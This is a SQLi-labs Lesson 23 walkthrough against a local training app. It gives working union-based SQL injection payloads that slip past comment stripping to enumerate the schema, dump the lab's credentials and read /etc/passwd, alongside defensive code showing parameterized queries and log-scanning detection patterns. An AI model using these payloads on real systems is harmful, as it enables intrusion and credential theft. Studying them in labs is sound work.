SQLi-labs: Lesson 23

GET - Error based - strip comments

  1. http://localhost/sqli/Less-23/?id=1'

    Error message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

  2. Basic injection: ?id=' or '1'='1

  3. Try union select: ?id=' union select 1,2 or '1'='1

    Error message: The used SELECT statements have a different number of columns

    So try three columns: ?id=' union select 1,2,3 or '1'='1 (it works: the column count now matches the original query)
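Why the payloads on this page end with or '1'='1 instead of a comment marker, and why stripping comments does not fix the bug, is easiest to see with a small stand-in for the vulnerable script. The following is an added example, not code from sqli-labs: it assumes the lesson's filter simply deletes the # and -- markers, uses an in-memory SQLite table in place of the lab's MySQL users table (constructed sample rows, not the lab's data), and builds the query SELECT ... WHERE id='<input>' LIMIT 0,1 that the error message above reveals. The second lookup function is the hardened form, a bound parameter, which turns the same inputs into harmless data.

```python
import re
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the lab's `users` table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")],
    )
    return conn


def strip_comments(value):
    # Assumed filter: the lesson title says comments are stripped, so this
    # deletes the '#' and '--' markers. Quotes and keywords pass through untouched.
    return re.sub(r"#|--", "", value)


def lookup_vulnerable(conn, user_input):
    # Same shape as the lab query revealed by the error message on this page:
    # the input is spliced into the string after filtering. Because the trailing
    # "' LIMIT 0,1" can no longer be commented out, a payload instead closes the
    # string and re-opens it with or '1'='1, so the leftover quote is absorbed.
    filtered = strip_comments(user_input)
    query = f"SELECT id, username, password FROM users WHERE id='{filtered}' LIMIT 0,1"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_input):
    # Hardened form: the value is bound, so quotes and SQL keywords inside it are
    # compared against the id column as data and never parsed as SQL.
    query = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(query, (user_input,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for payload in ("1", "' or '1'='1", "' union select 1,2,3 or '1'='1"):
        print(repr(payload))
        print("  concatenated :", lookup_vulnerable(db, payload))
        print("  parameterized:", lookup_parameterized(db, payload))
```

With the concatenated query the union payload returns the row (1, 2, 1): the third column is the expression 3 or '1'='1', which evaluates to true, matching the "Your Password:1" line on this page. The parameterized lookup returns nothing for either injected string, and no amount of extra filtering is needed to get there.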

Now let's play!

  1. Get version: ?id=' union select 1,version(),3 or '1'='1

    Result:

    Your Login name:5.6.30-1

    Your Password:1

  2. Get database name: ?id=' union select 1,database(),3 or '1'='1

    Result:

    Your Login name:security

  3. Get table name: ?id=' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 or '1'='1

    Result:

    Your Login name:emails,referers,uagents,users

  4. Get column name: ?id=' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 or '1'='1

    Result:

    Your Login name:id,username,password

  5. Get id\username\password triples (0x5c is a backslash, used as the separator): ?id=' union select 1,(select group_concat(id,0x5c,username,0x5c,password) from users limit 0,1),3 or '1'='1

    Result:

    Your Login name:1\Dumb\Dumb,2\Angelina\I-kill-you,3\Dummy\p@ssword,4\secure\crappy,5\stupid\stupidity,6\superman\genious,7\batman\mob!le,8\admin\admin,9\admin1\admin1,10\admin2\admin2,11\admin3\admin3,12\dhakkan\dumbo,14\admin4\admin4

  6. Do something funny: ?id=' union select 1,load_file("/etc/passwd"),3 or '1'='1
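Every request in the steps above leaves a distinctive trace in the web server's access log, which is where a defender would catch this kind of enumeration. The following is an added example, not part of the original write-up: it parses constructed Common Log Format lines (the sample entries are made up to mirror the requests shown on this page, with the payloads URL-encoded as a browser would send them), URL-decodes the path, and tags requests that contain union select, information_schema lookups, load_file(), or the comment-free or '1'='1 closer this lesson forces.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access log (not real traffic): three requests from one
# client carry the payload shapes seen in this lesson; two are ordinary lookups.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/Less-23/?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/Less-23/?id='%20union%20select%201,version(),3%20or%20'1'='1 HTTP/1.1" 200 540
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/Less-23/?id='%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='security'),3%20or%20'1'='1 HTTP/1.1" 200 600
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli/Less-23/?id='%20union%20select%201,load_file(%22/etc/passwd%22),3%20or%20'1'='1 HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli/Less-23/?id=2 HTTP/1.1" 200 510
"""

# Indicators are matched on the decoded path. The tautology pattern only
# requires an opening quote after '=', because the payload's final quote is
# supplied by the application's own query, not by the request.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "tautology": re.compile(r"\bor\s+'[^']*'\s*=\s*'", re.I),
    "comment_marker": re.compile(r"(--|#|/\*)"),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\d+)"
)


def parse_line(line):
    # Returns the named fields of one Common Log Format line, or None if it does not parse.
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path):
    # Decode once so percent-encoded payloads are inspected in their SQL form.
    decoded = unquote_plus(path)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def flag_requests(log_text):
    # Yields (client ip, raw path, indicator tags) for every request with at least one tag.
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["path"])
        if tags:
            hits.append((rec["ip"], rec["path"], tags))
    return hits


def count_by_ip(hits):
    # Simple triage view: how many tagged requests each client sent.
    return dict(Counter(ip for ip, _, _ in hits))


if __name__ == "__main__":
    flagged = flag_requests(SAMPLE_LOG)
    for ip, path, tags in flagged:
        print(ip, tags, path[:60])
    print(count_by_ip(flagged))
```

Note that the comment_marker indicator never fires on these samples: because the lesson's filter strips comments, the payloads do not contain any, so a detection rule that keys only on -- or # would miss the whole session. The tautology and schema_enum patterns are what actually surface it here.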
